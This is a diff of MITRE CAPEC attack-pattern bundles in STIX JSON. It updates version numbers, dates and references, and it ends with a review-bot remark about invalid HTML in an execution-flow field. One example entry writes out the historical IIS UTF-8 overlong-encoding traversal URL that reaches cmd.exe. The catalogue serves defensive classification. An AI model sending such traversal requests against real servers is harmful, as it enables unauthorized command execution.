"description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.",
|
||||
"external_references": [
|
||||
@@ -62,7 +62,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--a1a15ab1-b44f-43ef-9233-fbdd41cf403a",
|
||||
"id": "bundle--05af55e2-efd4-4877-8b5b-4961d0cd63ff",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -67,7 +67,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--58e3d023-7e15-4977-afaa-4612b4235ff0",
|
||||
"id": "bundle--4513bb7f-d3ee-4617-94de-7c062d513d80",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -50,7 +50,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--262aeb10-f03d-4f1c-947c-8229c12b5c02",
|
||||
"id": "bundle--d9fe419d-403b-4e1e-875d-81086ee5d3a7",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -30,7 +30,7 @@
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--ecfb075a-b00d-4c88-be80-5f5d77279df5",
|
||||
"id": "bundle--6ac87dd0-30cd-4bc1-8572-81a422873748",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -67,7 +67,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--ca5fbf51-b048-47a0-9ffe-18eef5dc66ae",
|
||||
"id": "bundle--6f822cbb-f954-401b-b741-a015b636de69",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -31,7 +31,7 @@
|
||||
"This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server."
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--bb4c8361-4f0e-4783-b971-337fa6b1cdec",
|
||||
"id": "bundle--61d9d162-3108-4196-a735-2b7063c8fcd1",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -39,7 +39,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--1b05f109-4afe-4f2f-9901-5d9e3e5348d8",
|
||||
"id": "bundle--5ed45acb-8287-4ab8-ac80-b66277767a17",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2015-11-09T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Authentication Abuse",
|
||||
"description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,11 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/287.html",
|
||||
"external_id": "CWE-287"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1244.html",
|
||||
"external_id": "CWE-1244"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -35,7 +40,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--f4ba1706-7432-4690-87fa-cc6d020ede2e",
|
||||
"id": "bundle--9db4ef98-3617-4c3b-95fe-f0860c71f98c",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Leveraging/Manipulating Configuration File Search Paths",
|
||||
"description": "This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.",
|
||||
"external_references": [
|
||||
@@ -27,6 +27,12 @@
|
||||
"url": "http://cwe.mitre.org/data/definitions/427.html",
|
||||
"external_id": "CWE-427"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Hijack Execution Flow:Path Interception by PATH Environment Variable",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1574/007",
|
||||
"external_id": "T1574.007"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
|
||||
@@ -68,7 +74,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--5d190fb5-88dc-4c0e-9bc3-2b27005fced9",
|
||||
"id": "bundle--2b5c5e1f-9855-411e-b9b9-0053fca55172",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Using UTF-8 Encoding to Bypass Validation Logic",
|
||||
"description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.",
|
||||
"external_references": [
|
||||
@@ -156,8 +156,9 @@
]
},
"x_capec_example_instances": [
"\n <xhtml:p>Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe</xhtml:div>\n <xhtml:p>the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.</xhtml:p>\n <xhtml:p>So when the attacker requested the tainted URL, he accessed</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">http://servername/scripts/../../winnt/system32/cmd.exe</xhtml:div>\n <xhtml:p>In other words, he walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where he could pass commands to the command shell, Cmd.exe.</xhtml:p>See also: CVE-2000-0884"
"\n <xhtml:p>Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe</xhtml:div>\n <xhtml:p>the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.</xhtml:p>\n <xhtml:p>So when the attacker requested the tainted URL, they accessed</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">http://servername/scripts/../../winnt/system32/cmd.exe</xhtml:div>\n <xhtml:p>In other words, they walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe.</xhtml:p>See also: CVE-2000-0884"
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Survey the application for user-controllable inputs: </b>Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.</td></tr><tr><td>Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Probe entry points to locate vulnerabilities: </b>The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.</td></tr><tr><td>Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.</td></tr><tr><td>Try to use UTF-8 encoding of content in CSS in order to bypass validation routines.</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.",
@@ -165,11 +166,11 @@
],
"x_capec_skills_required": {
"Low": "An attacker can inject different representation of a filtered character in UTF-8 format.",
"Medium": "An attacker may craft subtle encoding of input data by using the knowledge that she has gathered about the target host."
"Medium": "An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
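Review bot: In the added `x_capec_execution_flow` value, each Techniques `<table>` is placed directly inside the `<ol>` after `</li>` (`...</p></li><table>...</table></ol>`), which is not valid HTML since `ol` may only contain `li` children, so renderers recover from it inconsistently and the step-to-technique association can be lost. The list item should close after its table: `...</p><table>...</table></li></ol>`. Note also that this field carries bare `<h2>`/`<div>`/`<table>` markup while the neighbouring `x_capec_example_instances` entry uses `xhtml:`-namespaced tags, so consumers need to know which `x_capec_*` fields are markup to be rendered (and sanitised) rather than plain text; a short note on that in the bundle's accompanying documentation would help. If this bundle is emitted by a converter, the markup fix presumably belongs in the generator rather than in the JSON itself.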